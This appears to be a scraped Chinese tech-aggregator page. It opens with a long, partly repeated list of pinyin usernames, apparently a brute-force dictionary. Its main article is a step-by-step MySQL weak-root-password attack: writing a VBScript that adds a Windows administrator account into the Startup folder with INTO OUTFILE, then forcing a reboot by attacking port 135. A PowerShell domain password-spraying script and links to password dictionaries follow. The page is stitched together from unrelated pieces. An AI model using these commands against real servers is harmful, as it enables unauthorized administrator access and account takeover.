    liuli

    likai

    zhangyu

    zhangfeng

    liuxiulan

    zhangzhiqiang

    lilong

    lixiuyun

    lixiufang

    lishuai

    lixin

    liuyun

    zhanglili

    liji

    zhangxiuyun

    wangshuying

    wangchunmei

    wanghongmei

    chenbin

    liyuhua

    liguifang

    zhangying

    chenfei

    wangbo

    liuhao

    huangxiuying

    liuyuying

    lishuzhen

    huangyong

    zhouwei

    wangxiufang

    wanglihua

    wangdandan

    libin

    wangguixiang

    wangkun

    liuhui

    lixiang

    zhangrui

    zhangguizhen

    wangshuhua

    liushuai

    zhangfei

    zhangxiufang

    wangyang

    chenji

    zhangguifang

    zhanglijuan

    wangrong

    wuxiuying

    yangming

    liguixiang

    mali

    liuqian

    yangxiulan

    yangling

    wangxiuhua

    yangping

    wangbin

    liliang

    lirong

    liguizhi

    lilin

    liyan

    lijian

    wangbing

    wangguifang

    wangming

    chenmei

    zhangchunmei

    liyang

    wangyan

    wangdongmei

    liufeng

    lixiuhua

    lidandan

    yangxue

    liuyuhua

    maxiuying

    zhanglihua

    zhangshuzhen

    lixiaohong

    zhangbo

    wangxin

    wangguizhi

    zhaoli

    zhangxiuhua

    zhanglin

    huangmin

    yangjuan

    wangjinfeng

    zhoujie

    wanglei

    chenjianhua

    liumei

    yangguiying

    lishuying

    chenyuying

    yangxiuzhen

    sunxiuying

    zhaojun

    zhaoyong

    liubing

    yangbin

    liwen

    chenlin

    chenping

    sunwei

    zhangli

    chenjun

    zhangnan

    liuguizhen

    liuyu

    liujianjun

    zhangshuying

    lihongxia

    zhaoxiuying

    libo

    wangli

    zhangrong

    zhangfan

    wangjianping

    zhangguizhi

    zhangyu

    zhouyong

    zhangkun

    xuwei

    wangguihua

    liuqin

    zhoujing

    xumin

    liutingting

    xujing

    yanghong

    wanglu

    zhangshulan

    zhangwen

    yangyan

    chenguilan

    zhouli

    lishuhua

    chenxin

    machao

    liujianguo

    liguihua

    wangfenglan

    lishulan

    chenxiuzhen

    zhangwei

    wangwei

    wangfang

    liwei

    linuo

    zhangmin

    lijing

    wangjing

    liuwei

    wangxiuying

    zhangli

    lixiuying

    wangli

    zhangjing

    zhangxiuying

    liqiang

    wangmin

    limin

    wanglei

    liuyang

    wangyan

    wangyong

    lijun

    zhangyong

    lijie

    zhangjie

    zhanglei

    wangqiang

    lijuan

    wangjun

    zhangyan

    zhangtao

    wangtao

    liyan

    wangchao

    liming

    liyong

    wangjuan

    liujie

    liumin

    lixia

    lili

    zhangjun

    wangjie

    zhangqiang

    wangxiulan

    wanggang

    wangping

    liufang

    zhangyan

    liuyan

    liujun

    liping

    wanghui

    wangyan

    chenjing

    liuyong

    liling

    liguiying

    wangdan

    ligang

    lidan

    liping

    wangpeng

    liutao

    chenwei

    zhanghua

    liujing

    litao

    wangguiying

    zhangxiulan

    lihong

    lichao

    liuli

    zhangguiying

    wangyulan

    liyan

    zhangpeng

    lixiulan

    zhangchao

    wangling

    zhangling

    lihua

    wangfei

    zhangyulan

    wangguilan

    wangying

    liuqiang

    chenxiuying

    liying

    lihui

    limei

    chenyong

    wangxin

    lifang

    zhangguilan

    libo

    yangyong

    wangxia

    liguilan

    wangbin

    lipeng

    zhangping

    zhangli

    zhanghui

    zhangyu

    liujuan

    libin

    wanghao

    chenjie

    wangkai

    chenli

    chenmin

    wangxiuzhen

    liyulan

    liuxiuying

    wangping

    wangping

    zhangbo

    liuguiying

    yangxiuying

    zhangying

    yangli

    zhangjian

    lijun

    lili

    wangbo

    zhanghong

    liudan

    lixin

    wangli

    yangjing

    liuchao

    zhangjuan

    yangfan

    liuyan

    liuying

    lixue

    lixiuzhen

    zhangxin

    wangjian

    liuyulan

    liuhui

    liubo

    zhanghao

    zhangming

    chenyan

    zhangxia

    chenyan

    yangjie

    wangshuai

    lihui

    wangxue

    yangjun

    zhangxu

    liugang

    wanghua

    yangmin

    wangning

    lining

    wangjun

    liuguilan

    liubin

    zhangping

    wangting

    chentao

    wangyumei

    wangnuo

    zhangbin

    chenlong

    lilin

    wangyuzhen

    zhangfengying

    wanghong

    lifengying

    yangyang

    liting

    zhangjun

    wanglin

    chenying

    chenjun

    liuxia

    chenhao

    zhangkai

    wangjing

    chenfang

    zhangting

    yangtao

    yangbo

    chenhong

    liuhuan

    wangyuying

    chenjuan

    chengang

    wanghui

    zhangying

    zhanglin

    zhangnuo

    zhangyumei

    wangfengying

    zhangyuying

    lihongmei

    liujia

    liulei

    zhangqian

    liupeng

    wangxu

    zhangxue

    liyang

    zhangxiuzhen

    wangmei

    wangjianhua

    liyumei

    wangying

    liuping

    yangmei

    lifei

    wangliang

    lilei

    lijianhua

    wangyu

    chenling

    zhangjianhua

    liuxin

    wangqian

    zhangshuai

    lijian

    chenlin

    liyang

    chenqiang

    zhaojing

    wangcheng

    zhangyuzhen

    chenchao

    chenliang

    liunuo

    wangqin

    zhanglanying

    zhanghui

    liuchang

    liqian

    yangyan

    zhangliang

    zhangjian

    liyun

    zhangqin

    wanglanying

    liyuzhen

    liuping

    chenguiying

    liuying

    yangchao

    zhangmei

    chenping

    wangjian

    liuhong

    zhaowei

    zhangyun

    zhangning

    yanglin

    zhangji

    gaofeng

    wangjianguo

    yangyang

    chenhua

    yanghua

    wangjianjun

    yangliu

    liuyang

    wangshuzhen

    yangfang

    lichunmei

    liujun

    wanghaiyan

    liuling

    chenchen

    wanghuan

    lidongmei

    zhanglong

    chenbo

    chenlei

    wangyun

    wangfeng

    wangxiurong

    wangrui

    liqin

    liguizhen

    chenpeng

    wangying

    liufei

    wangxiuyun

    chenming

    wangguirong

    lihao

    wangzhiqiang

    zhangdan

    lifeng

    zhanghongmei

    liufengying

    liyuying

    wangxiumei

    lijia

    wanglijuan

    chenhui

    zhangtingting

    zhangfang

    wangtingting

    wangyuhua

    zhangjianguo

    lilanying

    wangguizhen

    lixiumei

    chenyulan

    chenxia

    liukai

    zhangyuhua

    liuyumei

    liuhua

    libing

    zhanglei

    wangdong

    lijianjun

    liuyuzhen

    wanglin

    lijianguo

    liying

    yangwei

    liguirong

    wanglong

    liuting

    chenxiulan

    zhangjianjun

    lixiurong

    liuming

    zhoumin

    zhangxiumei

    lixuemei

    huangwei

    zhanghaiyan

    wangshulan

    lizhiqiang

    yanglei

    lijing

    litingting

    zhangxiurong

    liujianhua

    wanglili

    zhaomin

    chenyun

    lihaiyan

    zhangguirong

    zhangjing

    liuli

    likai

    zhangyu

    zhangfeng

    liuxiulan

    zhangzhiqiang

    lilong

    lixiuyun

    lixiufang

    lishuai

    lixin

    liuyun

    zhanglili

    liji

    zhangxiuyun

    wangshuying

    wangchunmei

    wanghongmei

    chenbin

    liyuhua

    liguifang

    zhangying

    chenfei

    wangbo

    liuhao

    huangxiuying

    liuyuying

    lishuzhen

    huangyong

    zhouwei

    wangxiufang

    wanglihua

    wangdandan

    libin

    wangguixiang

    wangkun

    liuhui

    lixiang

    zhangrui

    zhangguizhen

    wangshuhua

    liushuai

    zhangfei

    zhangxiufang

    wangyang

    chenji

    zhangguifang

    zhanglijuan

    wangrong

    wuxiuying

    yangming

    liguixiang

    mali

    liuqian

    yangxiulan

    yangling

    wangxiuhua

    yangping

    wangbin

    liliang

    lirong

    liguizhi

    lilin

    liyan

    lijian

    wangbing

    wangguifang

    wangming

    chenmei

    zhangchunmei

    liyang

    wangyan

    wangdongmei

    liufeng

    lixiuhua

    lidandan

    yangxue

    liuyuhua

    maxiuying

    zhanglihua

    zhangshuzhen

    lixiaohong

    zhangbo

    wangxin

    wangguizhi

    zhaoli

    zhangxiuhua

    zhanglin

    huangmin

    yangjuan

    wangjinfeng

    zhoujie

    wanglei

    chenjianhua

    liumei

    yangguiying

    lishuying

    chenyuying

    yangxiuzhen

    sunxiuying

    zhaojun

    zhaoyong

    liubing

    yangbin

    liwen

    chenlin

    chenping

    sunwei

    zhangli

    chenjun

    zhangnan

    liuguizhen

    liuyu

    liujianjun

    zhangshuying

    lihongxia

    zhaoxiuying

    libo

    wangli

    zhangrong

    zhangfan

    wangjianping

    zhangguizhi

    zhangyu

    zhouyong

    zhangkun

    xuwei

    wangguihua

    liuqin

    zhoujing

    xumin

    liutingting

    xujing

    yanghong

    wanglu

    zhangshulan

    zhangwen

    yangyan

    chenguilan

    zhouli

    lishuhua

    chenxin

    machao

    liujianguo

    liguihua

    wangfenglan

    lishulan

    chenxiuzhen

    展开全文
  • 文章介绍关于防止mysql用户root密码弱口令的攻击,大家可以看看自己的mysql root是不是也存在这样的安全隐患。1、连接到对方MYSQL 服务器-u root -h 192.168.0.1mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。2、...

    文章介绍关于防止mysql用户root密码弱口令的攻击,大家可以看看自己的mysql root是不是也存在这样的安全隐患。

    1、连接到对方MYSQL 服务器

    -u root -h 192.168.0.1

    mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。

    2、让我们来看看服务器中有些什么

    mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。

    3、让我们进入数据库

    mysql>use test; 我们将会进入test数据库中。

    4、查看我们进入数据库中有些什么数据表

    mysql>show tables; 默认的情况下,test中没有任何表的存在。

    以下为关键的部分

    5、在TEST数据库下创建一个新的表;

    mysql>create table a (cmd text); 好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

    6、在表中插入内容

    代码如下

    复制代码

    mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

    mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

    mysql>insert into a values

    ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

    注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!  7、好了,现在我们来看看表a中有些什么

    mysql> * from a;我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步

    8、输出表为一个VBS的脚本文件

    mysql>select * from a into outfile "c:\docume~1\alluse~1\“开始”菜单\程序\启动\a.vbs"; 我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意""符号。

    9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。

    总结:不管你什么时候都需要注意自己服务器的安全否则就别谈其它应用程序了,本文章讲述的mysql root密码弱口令的攻击只是安全应用中的冰山一解而己。

    本文原创发布php中文网,转载请注明出处,感谢您的尊重!

    展开全文
  • 各种组合类型的密码字典、弱口令字典,常用密码,弱密码集合。解压出来共2.93 GB 的大量密码合辑txt。
  • 需求:标题就是需求,想用密码库批量检测一下域内的弱密码。 解决:PowerShell来实现,不需要第三方工具,不怕被人偷了密码。 本脚本需要3个文件,空的即可,位于d:/pwd下 1 name.csv,保存需要测试的用户名列表 2 ...

    需求:标题就是需求,想用密码库批量检测一下域内的弱密码。

    解决:PowerShell来实现,不需要第三方工具,不怕被人偷了密码。

    本脚本需要3个文件,空的即可,位于d:/pwd下

    1 name.csv,保存需要测试的用户名列表

    2 pwd.csv,保存需要测试的密码列表

    3 name2.csv,保存验证成功的密码

    域不能限制测试密码次数,必须管理员方式运行

    echo "本脚本需要3个文件,位于d:/pwd下"
    echo "1 name.csv,保存需要测试的用户名列表 "
    echo "2 pwd.csv,保存需要测试的密码列表"
    echo "3 name2.csv,保存验证成功的密码"
    echo "域不能限制测试密码次数,必须管理员方式运行"
    $files = (Get-Childitem d:\pwd\name2.csv).pspath
    $content get-content $files
    Import-Csv -Path D:\pwd\name.csv | foreach 
    $bb ="{0}" -F $_.name
    $UserName "tech\" +"$bb"
    Import-Csv -Path D:\pwd\pwd.csv | foreach 
    $pwd2 ="{0}" -F $_.pwd
    $pass ConvertTo-SecureString -AsPlainText $_.pwd -Force
    $cred New-Object System.Management.Automation.PSCredential($UserName,$Pass
    $dCred $cred
    $dUsername $dCred.username
    $dPassword $dCred.GetNetworkCredential().password
    $currentDomain "LDAP://" + ([ADSI]"").distinguishedName
    $auth = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain,$dUserName,$dPassword)
        if ($auth.name -eq $null)
        {
       # Write-Host 当前测试用户$bb 当前测试密码$pwd2
       # Write-Host "验证密码失败." -foregroundcolor 'Red'
        }
        else
       {      Write-Host 当前测试用户$bb 当前测试密码$pwd2
        Write-Host "密码测试成功 -> " $($auth.Name) -foregroundcolor 'green'
         $a = "密码测试成功 -> $UserName $pwd2|Out-File -Append  D:\pwd\name2.csv 
        }    }    }

    如果有密码验证成功的,会自动追加写入到D:\pwd\name2.csv下,同时,控制台会绿色显示那条记录。

    在上面的脚本中,我注释掉了两行,可以显示密码验证失败的时候,以红色显示记录,考虑到不显示会更节省内存,所以注释掉了。这个脚本用到了很多PowerShell的知识点,有兴趣的同学可以自己看看。

    本文转载自:http://blog.51cto.com/jiushu/1675200

    展开全文
  • 2020最新的弱口令大集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字亲测好用,大家快来下载吧,挺不错的一个资源哦!!
  • 安全产品系统、设备默认口令清单,国内防火墙默认密码,华为产品弱口令
  • 超级弱口令检查工具。包含TOP1000弱口令密码字典。亲测可用。有问题请留言。
  • 域用户弱口令检(po)测(jie)工具,非常实用,测试可用,帮助扫描弱口令
  • 2021最全弱口令常用口令大集合
  • 泄漏密码弱口令字典 密码弱口令字典完整
  • mysql弱口令检查方法

    2014-11-05 08:53:14
    一个简单的mysql弱口令检查脚本,希望能对给位有所帮助
  • 弱口令及对应md5值字典
  • 弱口令大集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字
  • 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。 工具采用C#开发,需要安装...
  • windows系统的弱口令检查工具和方法。引用“彩虹table”暴力猜解windows系统弱口令。对于用户设置的简单密码可以短时间破译。
  • 中国人最常使用的弱口令前100,这绝对不是国外人常用的top100,你看字典里面有woaini,5201314,aiwoma,键盘密码,等等口令你就可以确定是中国的,国外的弱口令会有各种单词人名比如john,divide啥的,真假自己看

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 16,457
精华内容 6,582
关键字:

密码弱口令